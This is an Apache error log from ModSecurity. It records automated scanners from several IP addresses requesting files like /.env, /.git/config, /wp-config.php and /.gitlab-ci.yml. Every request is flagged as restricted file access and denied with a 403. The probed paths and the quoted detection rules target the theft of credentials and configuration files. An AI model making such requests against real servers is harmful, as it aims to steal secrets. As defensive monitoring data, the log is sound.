[Wed Nov 12 23:39:46.023358 2025] [:error] [pid 24895] [client 147.135.220.53:60208] [client 147.135.220.53] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRUMsmDYfsA-9MHTCLNkBwAAAAE"]
[Thu Nov 13 06:21:49.038318 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQqgAAAAc"]
[Thu Nov 13 06:21:49.039350 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQqgAAAAc"]
[Thu Nov 13 06:21:49.039545 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQqgAAAAc"]
[Thu Nov 13 06:21:49.218538 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRVq7akUa8ZfM_Vo6haQqwAAAAc"]
[Thu Nov 13 06:21:49.219495 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRVq7akUa8ZfM_Vo6haQqwAAAAc"]
[Thu Nov 13 06:21:49.219679 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRVq7akUa8ZfM_Vo6haQqwAAAAc"]
[Thu Nov 13 06:21:49.547799 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrAAAAAc"]
[Thu Nov 13 06:21:49.549402 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrAAAAAc"]
[Thu Nov 13 06:21:49.549657 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrAAAAAc"]
[Thu Nov 13 06:21:49.929633 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrQAAAAc"]
[Thu Nov 13 06:21:49.930663 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrQAAAAc"]
[Thu Nov 13 06:21:49.930884 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aRVq7akUa8ZfM_Vo6haQrQAAAAc"]
[Thu Nov 13 06:21:50.215362 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrgAAAAc"]
[Thu Nov 13 06:21:50.216525 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrgAAAAc"]
[Thu Nov 13 06:21:50.216743 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrgAAAAc"]
[Thu Nov 13 06:21:50.511395 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrwAAAAc"]
[Thu Nov 13 06:21:50.511620 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrwAAAAc"]
[Thu Nov 13 06:21:50.512596 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrwAAAAc"]
[Thu Nov 13 06:21:50.512801 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aRVq7qkUa8ZfM_Vo6haQrwAAAAc"]
[Thu Nov 13 06:21:50.821484 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRVq7qkUa8ZfM_Vo6haQsAAAAAc"]
[Thu Nov 13 06:21:50.823187 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRVq7qkUa8ZfM_Vo6haQsAAAAAc"]
[Thu Nov 13 06:21:50.823407 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "aRVq7qkUa8ZfM_Vo6haQsAAAAAc"]
[Thu Nov 13 06:21:51.239053 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRVq76kUa8ZfM_Vo6haQsQAAAAc"]
[Thu Nov 13 06:21:51.240191 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRVq76kUa8ZfM_Vo6haQsQAAAAc"]
[Thu Nov 13 06:21:51.240417 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aRVq76kUa8ZfM_Vo6haQsQAAAAc"]
[Thu Nov 13 06:21:51.530110 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRVq76kUa8ZfM_Vo6haQsgAAAAc"]
[Thu Nov 13 06:21:51.531213 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRVq76kUa8ZfM_Vo6haQsgAAAAc"]
[Thu Nov 13 06:21:51.531461 2025] [:error] [pid 28559] [client 195.178.110.201:57014] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitlab-ci.yml"] [unique_id "aRVq76kUa8ZfM_Vo6haQsgAAAAc"]
[Thu Nov 13 08:59:00.055488 2025] [:error] [pid 28559] [client 45.144.212.58:47298] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRWPxKkUa8ZfM_Vo6haQxAAAAAc"]
[Thu Nov 13 08:59:00.055828 2025] [:error] [pid 28559] [client 45.144.212.58:47298] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRWPxKkUa8ZfM_Vo6haQxAAAAAc"]
[Thu Nov 13 08:59:00.055986 2025] [:error] [pid 28559] [client 45.144.212.58:47298] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRWPxKkUa8ZfM_Vo6haQxAAAAAc"]
[Thu Nov 13 16:07:57.474031 2025] [:error] [pid 37999] [client 13.212.7.168:60578] [client 13.212.7.168] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRX0TfauKODXD1zWqSeFsQAAAA0"]
[Thu Nov 13 16:07:57.474263 2025] [:error] [pid 37999] [client 13.212.7.168:60578] [client 13.212.7.168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRX0TfauKODXD1zWqSeFsQAAAA0"]
[Thu Nov 13 16:07:57.474439 2025] [:error] [pid 37999] [client 13.212.7.168:60578] [client 13.212.7.168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRX0TfauKODXD1zWqSeFsQAAAA0"]
[Thu Nov 13 18:26:26.783991 2025] [:error] [pid 28164] [client 13.212.57.14:46136] [client 13.212.57.14] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRYUwqCEQfGOMEuHg4qBlgAAAAM"]
[Thu Nov 13 18:26:26.784240 2025] [:error] [pid 28164] [client 13.212.57.14:46136] [client 13.212.57.14] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRYUwqCEQfGOMEuHg4qBlgAAAAM"]
[Thu Nov 13 18:26:26.784406 2025] [:error] [pid 28164] [client 13.212.57.14:46136] [client 13.212.57.14] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRYUwqCEQfGOMEuHg4qBlgAAAAM"]
[Thu Nov 13 20:53:32.365938 2025] [:error] [pid 38000] [client 45.139.104.183:34354] [client 45.139.104.183] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRY3PPqX-Qa3_8pftNO2EwAAAA4"]
